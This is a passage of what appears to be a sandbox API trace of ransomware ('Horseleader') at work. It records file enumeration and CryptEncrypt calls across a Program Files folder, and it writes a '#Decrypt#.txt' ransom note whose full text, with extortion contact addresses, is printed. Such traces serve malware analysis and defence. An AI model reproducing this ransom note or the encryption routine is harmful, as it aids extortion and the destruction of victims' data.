(lpString1="NavigationUp_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.746] lstrlenW (lpString=".testttjffg") returned 11 [0251.746] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationUp_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.746] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.746] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.747] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.747] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f92fbec, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f92fbec, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ef31505, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x6114, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="reflect.png", cAlternateFileName="")) returned 1 [0251.747] lstrcmpiW (lpString1="reflect.png", lpString2="Windows") returned -1 [0251.747] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\reflect.png") returned 70 [0251.747] StrStrIW (lpFirst="reflect.png", lpSrch=".horseleader") returned 0x0 [0251.747] lstrcmpW (lpString1="reflect.png", 
lpString2="#Decrypt#.txt") returned 1 [0251.747] lstrcmpW (lpString1="reflect.png", lpString2="_uninstalling_.png") returned 1 [0251.747] lstrlenW (lpString=".testttjffg") returned 11 [0251.747] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\reflect.png", lpSrch=".testttjffg") returned 0x0 [0251.747] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.747] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.747] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\reflect.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\reflect.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.749] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f97bea6, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f97bea6, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ef31505, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2fcdc, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="vistabg.png", cAlternateFileName="")) returned 1 [0251.749] lstrcmpiW (lpString1="vistabg.png", lpString2="Windows") returned -1 [0251.749] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\vistabg.png") returned 70 [0251.749] StrStrIW (lpFirst="vistabg.png", lpSrch=".horseleader") returned 0x0 [0251.749] lstrcmpW (lpString1="vistabg.png", lpString2="#Decrypt#.txt") returned 1 [0251.749] lstrcmpW 
(lpString1="vistabg.png", lpString2="_uninstalling_.png") returned 1 [0251.749] lstrlenW (lpString=".testttjffg") returned 11 [0251.749] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\vistabg.png", lpSrch=".testttjffg") returned 0x0 [0251.749] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.749] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.749] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\vistabg.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\vistabg.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.749] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f97bea6, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f97bea6, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ef31505, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2fcdc, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="vistabg.png", cAlternateFileName="")) returned 0 [0251.749] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0251.750] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\#Decrypt#.txt") returned 72 [0251.750] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\#Decrypt#.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\#decrypt#.txt"), 
dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.752] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0251.752] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0251.754] lstrlenA (lpString="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") returned 1368 [0251.754] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0251.754] CloseHandle (hObject=0x158) returned 1 [0251.754] GetProcessHeap () returned 0x780000 [0251.754] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.754] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ea9b652, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ea9b652, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee98f8d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="rectangle_babypink_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0251.754] lstrcmpiW (lpString1="rectangle_babypink_Thumbnail.bmp", lpString2="Windows") returned -1 [0251.754] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_babypink_Thumbnail.bmp") returned 80 [0251.754] StrStrIW (lpFirst="rectangle_babypink_Thumbnail.bmp", lpSrch=".horseleader") returned 0x0 [0251.755] lstrcmpW (lpString1="rectangle_babypink_Thumbnail.bmp", lpString2="#Decrypt#.txt") returned 1 [0251.755] lstrcmpW (lpString1="rectangle_babypink_Thumbnail.bmp", lpString2="_uninstalling_.png") returned 1 [0251.755] lstrlenW 
(lpString=".testttjffg") returned 11 [0251.755] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_babypink_Thumbnail.bmp", lpSrch=".testttjffg") returned 0x0 [0251.755] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.755] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.755] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_babypink_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_babypink_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.756] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ea9b652, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ea9b652, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee98f8d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="rectangle_glass_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0251.756] lstrcmpiW (lpString1="rectangle_glass_Thumbnail.bmp", lpString2="Windows") returned -1 [0251.756] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_glass_Thumbnail.bmp") returned 77 [0251.756] StrStrIW (lpFirst="rectangle_glass_Thumbnail.bmp", lpSrch=".horseleader") returned 0x0 [0251.757] lstrcmpW (lpString1="rectangle_glass_Thumbnail.bmp", lpString2="#Decrypt#.txt") returned 1 [0251.757] lstrcmpW 
(lpString1="rectangle_glass_Thumbnail.bmp", lpString2="_uninstalling_.png") returned 1 [0251.757] lstrlenW (lpString=".testttjffg") returned 11 [0251.757] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_glass_Thumbnail.bmp", lpSrch=".testttjffg") returned 0x0 [0251.757] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.757] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.757] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_glass_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_glass_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.757] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eac17af, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6eac17af, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee98f8d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="rectangle_highlights_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0251.757] lstrcmpiW (lpString1="rectangle_highlights_Thumbnail.bmp", lpString2="Windows") returned -1 [0251.757] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_highlights_Thumbnail.bmp") returned 82 [0251.758] StrStrIW (lpFirst="rectangle_highlights_Thumbnail.bmp", lpSrch=".horseleader") returned 0x0 [0251.758] lstrcmpW 
(lpString1="rectangle_highlights_Thumbnail.bmp", lpString2="#Decrypt#.txt") returned 1 [0251.758] lstrcmpW (lpString1="rectangle_highlights_Thumbnail.bmp", lpString2="_uninstalling_.png") returned 1 [0251.758] lstrlenW (lpString=".testttjffg") returned 11 [0251.758] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_highlights_Thumbnail.bmp", lpSrch=".testttjffg") returned 0x0 [0251.758] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.758] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.758] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_highlights_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_highlights_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.758] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eae790c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6eae790c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4eebf0eb, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="rectangle_performance_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0251.758] lstrcmpiW (lpString1="rectangle_performance_Thumbnail.bmp", lpString2="Windows") returned -1 [0251.758] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_performance_Thumbnail.bmp") returned 83 [0251.758] 
StrStrIW (lpFirst="rectangle_performance_Thumbnail.bmp", lpSrch=".horseleader") returned 0x0 [0251.759] lstrcmpW (lpString1="rectangle_performance_Thumbnail.bmp", lpString2="#Decrypt#.txt") returned 1 [0251.759] lstrcmpW (lpString1="rectangle_performance_Thumbnail.bmp", lpString2="_uninstalling_.png") returned 1 [0251.759] lstrlenW (lpString=".testttjffg") returned 11 [0251.759] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_performance_Thumbnail.bmp", lpSrch=".testttjffg") returned 0x0 [0251.759] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.759] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.759] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_performance_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_performance_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.759] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eb0da69, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6eb0da69, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4eebf0eb, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="rectangle_photo_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0251.759] lstrcmpiW (lpString1="rectangle_photo_Thumbnail.bmp", lpString2="Windows") returned -1 [0251.759] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program 
Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_photo_Thumbnail.bmp") returned 77 [0251.759] StrStrIW (lpFirst="rectangle_photo_Thumbnail.bmp", lpSrch=".horseleader") returned 0x0 [0251.759] lstrcmpW (lpString1="rectangle_photo_Thumbnail.bmp", lpString2="#Decrypt#.txt") returned 1 [0251.759] lstrcmpW (lpString1="rectangle_photo_Thumbnail.bmp", lpString2="_uninstalling_.png") returned 1 [0251.759] lstrlenW (lpString=".testttjffg") returned 11 [0251.760] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_photo_Thumbnail.bmp", lpSrch=".testttjffg") returned 0x0 [0251.760] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.760] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.760] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_photo_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_photo_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.761] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ea754f5, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ea754f5, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4eebf0eb, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="rectangle_plain_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0251.761] lstrcmpiW (lpString1="rectangle_plain_Thumbnail.bmp", lpString2="Windows") returned -1 [0251.761] wnsprintfW (in: pszDest=0x79b628, 
cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_plain_Thumbnail.bmp") returned 77 [0251.761] StrStrIW (lpFirst="rectangle_plain_Thumbnail.bmp", lpSrch=".horseleader") returned 0x0 [0251.761] lstrcmpW (lpString1="rectangle_plain_Thumbnail.bmp", lpString2="#Decrypt#.txt") returned 1 [0251.761] lstrcmpW (lpString1="rectangle_plain_Thumbnail.bmp", lpString2="_uninstalling_.png") returned 1 [0251.761] lstrlenW (lpString=".testttjffg") returned 11 [0251.761] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_plain_Thumbnail.bmp", lpSrch=".testttjffg") returned 0x0 [0251.761] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.761] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.762] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_plain_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_plain_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.762] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eb33bc6, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6eb33bc6, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4eebf0eb, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="rectangle_postage_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0251.762] lstrcmpiW (lpString1="rectangle_postage_Thumbnail.bmp", 
lpString2="Windows") returned -1 [0251.762] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_postage_Thumbnail.bmp") returned 79 [0251.762] StrStrIW (lpFirst="rectangle_postage_Thumbnail.bmp", lpSrch=".horseleader") returned 0x0 [0251.762] lstrcmpW (lpString1="rectangle_postage_Thumbnail.bmp", lpString2="#Decrypt#.txt") returned 1 [0251.762] lstrcmpW (lpString1="rectangle_postage_Thumbnail.bmp", lpString2="_uninstalling_.png") returned 1 [0251.762] lstrlenW (lpString=".testttjffg") returned 11 [0251.762] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_postage_Thumbnail.bmp", lpSrch=".testttjffg") returned 0x0 [0251.762] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.762] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.762] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_postage_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_postage_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.763] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eb59d23, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6eb59d23, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4eebf0eb, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="rectangle_scrapbook_Thumbnail.bmp", cAlternateFileName="")) 
returned 1 [0251.763] lstrcmpiW (lpString1="rectangle_scrapbook_Thumbnail.bmp", lpString2="Windows") returned -1 [0251.763] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_scrapbook_Thumbnail.bmp") returned 81 [0251.763] StrStrIW (lpFirst="rectangle_scrapbook_Thumbnail.bmp", lpSrch=".horseleader") returned 0x0 [0251.763] lstrcmpW (lpString1="rectangle_scrapbook_Thumbnail.bmp", lpString2="#Decrypt#.txt") returned 1 [0251.763] lstrcmpW (lpString1="rectangle_scrapbook_Thumbnail.bmp", lpString2="_uninstalling_.png") returned 1 [0251.763] lstrlenW (lpString=".testttjffg") returned 11 [0251.763] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_scrapbook_Thumbnail.bmp", lpSrch=".testttjffg") returned 0x0 [0251.763] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.763] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.763] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_scrapbook_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_scrapbook_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.770] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eb59d23, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6eb59d23, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4eebf0eb, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, 